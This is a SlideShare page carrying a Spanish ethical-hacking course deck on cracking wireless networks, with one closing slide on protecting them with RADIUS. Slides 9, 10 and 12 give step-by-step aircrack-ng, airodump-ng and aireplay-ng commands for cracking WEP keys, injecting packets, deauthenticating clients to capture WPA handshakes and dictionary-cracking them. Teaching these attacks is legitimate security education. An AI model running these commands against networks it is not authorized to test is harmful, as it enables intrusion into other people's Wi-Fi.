Ing. Pablo Daniel Pazmiño Naranjo
CEC-EPN
 Es mejor conservar a un enemigo
intacto que destruirlo.
Tsun-tsu
El arte de la guerra
OBJETIVOS
 Conocer los tipos de redes inalámbricas
existentes y sus ataques más comunes.
 Aprender a hacer ataques a red...
WLAN HACKING
 Tipos de redes “hackeables”
 WEP cracking
 WPA cracking
 Cómo proteger redes inalámbricas
corporativas
TIPOS DE REDES “HACKEABLES”
 Fundamentos:
 Arquitectura ‘abierta’ de emisión de datos
por el aire
 Cualquier computador...
TIPOS DE REDES “HACKEABLES”
 Redes hackeables:
 WEP
○ Seguridad basada en encabezado de tramas
con IVS (Vector de Inicia...
WLAN HACKING
 Tipos de redes “hackeables”
 WEP cracking
 WAP cracking
 Cómo proteger redes inalámbricas
corporativas
WEP CRACKING
 WEP crack
 Más fácil que ninguno!
 Intuitivo
 Se basa en recolección de datos y análisis del
sistema de ...
WEP CRACKING
 Pasos:
 1. Monitorear el tráfico con un analizador.
Ej.: Kismet
 2. Capturar datos con airodump-ng
○ airo...
WEP CRACKING
 Pasos:
 4. Inyectar paquetes con aireplay-ng
(opcional cuando no se tiene tráfico del
objetivo)
○ aireplay...
WLAN HACKING
 Tipos de redes “hackeables”
 WEP cracking
 WPA cracking
 Cómo proteger redes inalámbricas
corporativas
WPA CRACKING
 Pasos:
 Monitorear la red:
○ airmon-ng start wlan0
 Comenzar a capturar tráfico sobre la red
monitoreada ...
WLAN HACKING
 Tipos de redes “hackeables”
 WEP cracking
 WAP cracking
 Cómo proteger redes inalámbricas
corporativas
CÓMO PROTEGER REDES
INALÁMBRICAS CORPORATIVAS
 Incrementar seguridad sobre las redes
inalámbricas
 Asegurar un servidor ...
Upcoming SlideShare
Loading in...5
×

Ethical hacking course wlan hacking

648

Published on

hackear redes waln

0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total Views
648
On Slideshare
0
From Embeds
0
Number of Embeds
0
Actions
Shares
0
Downloads
47
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

Ethical hacking course wlan hacking

  1. 1. Ing. Pablo Daniel Pazmiño Naranjo CEC-EPN
  2. 2.  Es mejor conservar a un enemigo intacto que destruirlo. Tsun-tsu El arte de la guerra
  3. 3. OBJETIVOS  Conocer los tipos de redes inalámbricas existentes y sus ataques más comunes.  Aprender a hacer ataques a redes WEP.  Aprender a hacer ataques a redes WPA.  Conocer como defender redes de posibles ataques con un esquema seguro.
  4. 4. WLAN HACKING  Tipos de redes “hackeables”  WEP cracking  WPA cracking  Cómo proteger redes inalámbricas corporativas
  5. 5. TIPOS DE REDES “HACKEABLES”  Fundamentos:  Arquitectura ‘abierta’ de emisión de datos por el aire  Cualquier computador con acceso a una línea de vista directa con señal puede ingresar  Necesidad de encripción – Vulnerabilidades asociadas a distribución del medio
  6. 6. TIPOS DE REDES “HACKEABLES”  Redes hackeables:  WEP ○ Seguridad basada en encabezado de tramas con IVS (Vector de Inicialización) que guardan la clave con la que se autentican en el Access Point o router  WPA ○ Seguridad basada en encripción de las tramas viajando con una llave compartida (shared key)
  7. 7. WLAN HACKING  Tipos de redes “hackeables”  WEP cracking  WAP cracking  Cómo proteger redes inalámbricas corporativas
  8. 8. WEP CRACKING  WEP crack  Más fácil que ninguno!  Intuitivo  Se basa en recolección de datos y análisis del sistema de vectores de inicialización (IVS) para verificar como se codifican las claves y por “voto mayoritario” se definen las claves.  Ataca vulnerabilidad de encripción de cada trama en la cabecera de la misma. ○ Se analizan las tramas capturadas ○ Se separan las cabeceras que contienen la información capturada con la clave que ‘encripta’ la trama ○ Se realiza una ‘votación’ para ver cuál es la clave más utilizada – al menos el 80% de las tramas capturadas.
  9. 9. WEP CRACKING  Pasos:  1. Monitorear el tráfico con un analizador. Ej.: Kismet  2. Capturar datos con airodump-ng ○ airodump-ng wlan0 -w /root/Desktop/capturas.IVS --channel canal -- ivs  3. Asociarse la tarjeta con el router objetivo con aireplay-ng (opcional cuando no se tiene mucho tráfico capturado)
  10. 10. WEP CRACKING  Pasos:  4. Inyectar paquetes con aireplay-ng (opcional cuando no se tiene tráfico del objetivo) ○ aireplay-ng -3 -b mac-objetivo -h mac-local wlan0  5. Decriptar los IVS con aircrack-ng (Mínimo capturar 50 MB solo de IVS ○ aircrack-ng -s /root/Desktop/capturas.IVS  6. Disfrute!!! 
  11. 11. WLAN HACKING  Tipos de redes “hackeables”  WEP cracking  WPA cracking  Cómo proteger redes inalámbricas corporativas
  12. 12. WPA CRACKING  Pasos:  Monitorear la red: ○ airmon-ng start wlan0  Comenzar a capturar tráfico sobre la red monitoreada con: ○ airodump-ng -c 2 -w archivocrack --bssid MAC mon0  Capturar un handshake ○ aireplay-ng -0 10 -a MACAP -c MACCLIENTE mon0  Crackear la red con un archivo de diccionario de passwords ○ aircrack-ng archivocrack -w diccionario
  13. 13. WLAN HACKING  Tipos de redes “hackeables”  WEP cracking  WAP cracking  Cómo proteger redes inalámbricas corporativas
  14. 14. CÓMO PROTEGER REDES INALÁMBRICAS CORPORATIVAS  Incrementar seguridad sobre las redes inalámbricas  Asegurar un servidor RADIUS para autenticación de usuarios en la red.  Para windows: ○ www.zero13wireless.net/foro/showthread.php ?606-Como-Instalar-un-Servidor-de-Radius- para-la-Validacion....  Para linux: ○ http://www.scribd.com/doc/33983013/Manual- Servidor-Radius-Linux-Ubuntu
  1. A particular slide catching your eye?

    Clipping is a handy way to collect important slides you want to go back to later.

×